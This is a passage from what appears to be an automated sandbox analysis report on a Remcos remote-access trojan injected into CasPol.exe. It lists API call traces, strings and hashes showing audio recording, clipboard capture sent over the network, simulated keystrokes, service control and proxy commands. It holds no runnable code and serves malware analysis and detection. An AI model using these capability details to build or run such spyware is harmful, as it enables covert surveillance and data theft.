                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32(00474A28,00000000,BG3i@,00003000,00000004,00000000,00000001), ref: 00406647
                                                                                                            • GetCurrentProcess.KERNEL32(00474A28,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe), ref: 00406705
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CurrentProcess
                                                                                                            • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir$BG3i@
                                                                                                            • API String ID: 2050909247-4145329354
                                                                                                            APIs
                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419C94
                                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CAB
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CB8
                                                                                                            • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CC7
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CD8
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CDB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                            • String ID:
                                                                                                            • API String ID: 221034970-0
                                                                                                            APIs
                                                                                                            • _free.LIBCMT ref: 00446DDF
                                                                                                              • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                                                              • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                                            • _free.LIBCMT ref: 00446DEB
                                                                                                            • _free.LIBCMT ref: 00446DF6
                                                                                                            • _free.LIBCMT ref: 00446E01
                                                                                                            • _free.LIBCMT ref: 00446E0C
                                                                                                            • _free.LIBCMT ref: 00446E17
                                                                                                            • _free.LIBCMT ref: 00446E22
                                                                                                            • _free.LIBCMT ref: 00446E2D
                                                                                                            • _free.LIBCMT ref: 00446E38
                                                                                                            • _free.LIBCMT ref: 00446E46
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 776569668-0
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Eventinet_ntoa
                                                                                                            • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
                                                                                                            • API String ID: 3578746661-4192532303
                                                                                                            APIs
                                                                                                            • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00455DAF), ref: 0045515C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: DecodePointer
                                                                                                            • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                            • API String ID: 3527080286-3064271455
                                                                                                            APIs
                                                                                                            • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C
                                                                                                              • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                            • Sleep.KERNEL32(00000064), ref: 00416688
                                                                                                            • DeleteFileW.KERNEL32(00000000), ref: 004166BC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$CreateDeleteExecuteShellSleep
                                                                                                            • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                                            • API String ID: 1462127192-2001430897
                                                                                                            APIs
                                                                                                            • _strftime.LIBCMT ref: 00401AD3
                                                                                                              • Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                                            • waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00401B85
                                                                                                            • waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
                                                                                                            • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                                            • String ID: %Y-%m-%d %H.%M$.wav$`=G$x=G
                                                                                                            • API String ID: 3809562944-3643129801
                                                                                                            APIs
                                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
                                                                                                            • waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
                                                                                                            • waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
                                                                                                            • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
                                                                                                            • waveInStart.WINMM ref: 00401A81
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                                            • String ID: XCG$`=G$x=G
                                                                                                            • API String ID: 1356121797-903574159
                                                                                                            APIs
                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C988
                                                                                                              • Part of subcall function 0041CA1F: RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                                                                              • Part of subcall function 0041CA1F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                                                                              • Part of subcall function 0041CA1F: GetLastError.KERNEL32 ref: 0041CA91
                                                                                                            • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9BF
                                                                                                            • lstrcpynA.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9D9
                                                                                                            • Shell_NotifyIconA.SHELL32(00000000,00473B50), ref: 0041C9EF
                                                                                                            • TranslateMessage.USER32(?), ref: 0041C9FB
                                                                                                            • DispatchMessageA.USER32(?), ref: 0041CA05
                                                                                                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CA12
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                                            • String ID: Remcos
                                                                                                            • API String ID: 1970332568-165870891
APIs
• GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,00452E03,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00452BD6
• MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452C59
• __alloca_probe_16.LIBCMT ref: 00452C91
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,00452E03,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452CEC
• __alloca_probe_16.LIBCMT ref: 00452D3B
• MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D03
  • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D7F
• __freea.LIBCMT ref: 00452DAA
• __freea.LIBCMT ref: 00452DB6
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
• String ID:
• API String ID: 201697637-0
APIs
  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
• _memcmp.LIBVCRUNTIME ref: 004446A3
• _free.LIBCMT ref: 00444714
• _free.LIBCMT ref: 0044472D
• _free.LIBCMT ref: 0044475F
• _free.LIBCMT ref: 00444768
• _free.LIBCMT ref: 00444774
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: _free$ErrorLast$_abort_memcmp
• String ID: C
• API String ID: 1679612858-1037565863
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID:
• String ID: tcp$udp
• API String ID: 0-3725065008
APIs
• ExitThread.KERNEL32 ref: 004017F4
  • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
  • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
• waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00401902
  • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
• __Init_thread_footer.LIBCMT ref: 004017BC
  • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
  • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
• String ID: T=G$p[G$>G$>G
• API String ID: 1596592924-2461731529
APIs
• CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
• WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
• CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
• MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
• CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
• DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18
  • Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
  • Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
• String ID: .part
• API String ID: 1303771098-3499674018
APIs
  • Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004125A6
  • Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA,00000000,00000000,?,00000400), ref: 004125C5
  • Part of subcall function 00412584: RegCloseKey.ADVAPI32(?), ref: 004125CE
  • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
• _wcslen.LIBCMT ref: 0041A8F6
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: CloseCurrentOpenProcessQueryValue_wcslen
• String ID: .exe$:@$XCG$http\shell\open\command$program files (x86)\$program files\
• API String ID: 37874593-703403762
APIs
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0043D564,0043D564,?,?,?,00449BA1,00000001,00000001,1AE85006), ref: 004499AA
• __alloca_probe_16.LIBCMT ref: 004499E2
• MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00449BA1,00000001,00000001,1AE85006,?,?,?), ref: 00449A30
• __alloca_probe_16.LIBCMT ref: 00449AC7
• WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,1AE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B2A
• __freea.LIBCMT ref: 00449B37
  • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
• __freea.LIBCMT ref: 00449B40
• __freea.LIBCMT ref: 00449B65
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
• String ID:
• API String ID: 3864826663-0
APIs
• SendInput.USER32 ref: 00418B08
• SendInput.USER32(00000001,?,0000001C), ref: 00418B30
• SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B57
• SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B75
• SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B95
• SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BBA
• SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BDC
• SendInput.USER32(00000001,?,0000001C), ref: 00418BFF
  • Part of subcall function 00418AB1: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418AB7
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: InputSend$Virtual
• String ID:
• API String ID: 1167301434-0
APIs
• OpenClipboard.USER32 ref: 00415A46
• EmptyClipboard.USER32 ref: 00415A54
• CloseClipboard.USER32 ref: 00415A5A
• OpenClipboard.USER32 ref: 00415A61
• GetClipboardData.USER32(0000000D), ref: 00415A71
• GlobalLock.KERNEL32(00000000), ref: 00415A7A
• GlobalUnlock.KERNEL32(00000000), ref: 00415A83
• CloseClipboard.USER32 ref: 00415A89
  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
• String ID:
• API String ID: 2172192267-0
APIs
• _free.LIBCMT ref: 00447EBC
• _free.LIBCMT ref: 00447EE0
• _free.LIBCMT ref: 00448067
• GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
• WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
• WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
• _free.LIBCMT ref: 00448233
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: _free$ByteCharMultiWide$InformationTimeZone
• String ID:
• API String ID: 314583886-0
                                                                                                            • Opcode ID: 15f6b1feb3d3775b51f59aeb9f2b7affb26a76ec7276939fd337acb65b8e2728
                                                                                                            • Instruction ID: d74e55ca02e924b9256a88f94e7be2aa31ce1fd8fbfcff02d88bcfbefc6cbd9d
                                                                                                            • Opcode Fuzzy Hash: 15f6b1feb3d3775b51f59aeb9f2b7affb26a76ec7276939fd337acb65b8e2728
                                                                                                            • Instruction Fuzzy Hash: 32C12871904205ABFB24DF799C41AAE7BB8EF46314F2441AFE484A7351EB388E47C758
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _free
                                                                                                            • String ID:
                                                                                                            • API String ID: 269201875-0
                                                                                                            • Opcode ID: 154a0d9c569a12efbd1fb523a4d55ce0e4318de2d30962be95ff360cd9ef53d7
                                                                                                            • Instruction ID: 5fecc71d39e6a90402c47f7728bb4f6831cdfeb90858b0dfc168023e2edb8b83
                                                                                                            • Opcode Fuzzy Hash: 154a0d9c569a12efbd1fb523a4d55ce0e4318de2d30962be95ff360cd9ef53d7
                                                                                                            • Instruction Fuzzy Hash: 2361BFB1900205AFEB20DF69C841BAABBF4EB45720F24417BE944FB392E7349D45CB59
                                                                                                            APIs
                                                                                                              • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                            • _free.LIBCMT ref: 00444086
                                                                                                            • _free.LIBCMT ref: 0044409D
                                                                                                            • _free.LIBCMT ref: 004440BC
                                                                                                            • _free.LIBCMT ref: 004440D7
                                                                                                            • _free.LIBCMT ref: 004440EE
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _free$AllocateHeap
                                                                                                            • String ID: J7D
                                                                                                            • API String ID: 3033488037-1677391033
                                                                                                            • Opcode ID: 7bd75c35ecc30b271b00b77e92f4063212cf76abbfff81b413b55d476d69b5fb
                                                                                                            • Instruction ID: b5a2c1f2d034459fb850ff781f480331835685433a1d37f27cfcf8091ebf3f31
                                                                                                            • Opcode Fuzzy Hash: 7bd75c35ecc30b271b00b77e92f4063212cf76abbfff81b413b55d476d69b5fb
                                                                                                            • Instruction Fuzzy Hash: 9251E371A00604AFEB20DF6AC841B6AB3F4EF95724F14416EE909D7251E739ED15CB88
                                                                                                            APIs
                                                                                                            • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044A838,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044A105
                                                                                                            • __fassign.LIBCMT ref: 0044A180
                                                                                                            • __fassign.LIBCMT ref: 0044A19B
                                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044A1C1
                                                                                                            • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A1E0
                                                                                                            • WriteFile.KERNEL32(?,?,00000001,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A219
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                            • String ID:
                                                                                                            • API String ID: 1324828854-0
                                                                                                            • Opcode ID: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                                            • Instruction ID: b40464c9ec282996611fef5cbd20273031f87559cdf671a411eba52403cbf28d
                                                                                                            • Opcode Fuzzy Hash: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                                            • Instruction Fuzzy Hash: DB51E270E002099FEB10CFA8D881AEEBBF8FF09300F14416BE815E3391D6749951CB6A
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _free
                                                                                                            • String ID: HE$HE
                                                                                                            • API String ID: 269201875-1978648262
                                                                                                            • Opcode ID: 65ff1149e5400faf749e77ee0a373f8307c7a4f77e118ae33a4d82d27c9b20c0
                                                                                                            • Instruction ID: 4134de32792d44acead4bb36f8da9b5b282593f8ffe10db144b1eaf4d9577b64
                                                                                                            • Opcode Fuzzy Hash: 65ff1149e5400faf749e77ee0a373f8307c7a4f77e118ae33a4d82d27c9b20c0
                                                                                                            • Instruction Fuzzy Hash: 90412A31A009106BEF24AABA8CD5A7F3B64DF45375F14031BFC1896293D67C8C4996AA
                                                                                                            APIs
                                                                                                            • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412CC1
                                                                                                              • Part of subcall function 004129AA: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                                              • Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                            • RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 00412E31
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseEnumInfoOpenQuerysend
                                                                                                            • String ID: TUFTUF$>G$DG$DG
                                                                                                            • API String ID: 3114080316-344394840
                                                                                                            • Opcode ID: 7214b498c24b6a36b25b04773345f8211cdfd8029bb5f3628422aaf0decccd1e
                                                                                                            • Instruction ID: 92049c6ae7fba3f13a57cd60a3827c89810429dfa6cf24b756c0ab1f01d338b1
                                                                                                            • Opcode Fuzzy Hash: 7214b498c24b6a36b25b04773345f8211cdfd8029bb5f3628422aaf0decccd1e
                                                                                                            • Instruction Fuzzy Hash: 0141A2316042009BC224F635D9A2AEF7394AFD0708F50843FF94A671E2EF7C5D4986AE
                                                                                                            APIs
                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00437AAB
                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 00437AB3
                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00437B41
                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00437B6C
                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00437BC1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                            • String ID: csm
                                                                                                            • API String ID: 1170836740-1018135373
                                                                                                            • Opcode ID: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                                                                                                            • Instruction ID: 9404c61c081bc4e6da2099be8a52027e1297fde76841380def533d3eaa533744
                                                                                                            • Opcode Fuzzy Hash: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                                                                                                            • Instruction Fuzzy Hash: CD410970A04209DBCF20EF19C844A9FBBB5AF0932CF14915BE8556B392D739EE05CB95
                                                                                                            APIs
                                                                                                              • Part of subcall function 00412513: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                              • Part of subcall function 00412513: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                              • Part of subcall function 00412513: RegCloseKey.KERNELBASE(?), ref: 0041255F
                                                                                                            • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
                                                                                                            • PathFileExistsA.SHLWAPI(?), ref: 0040B779
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
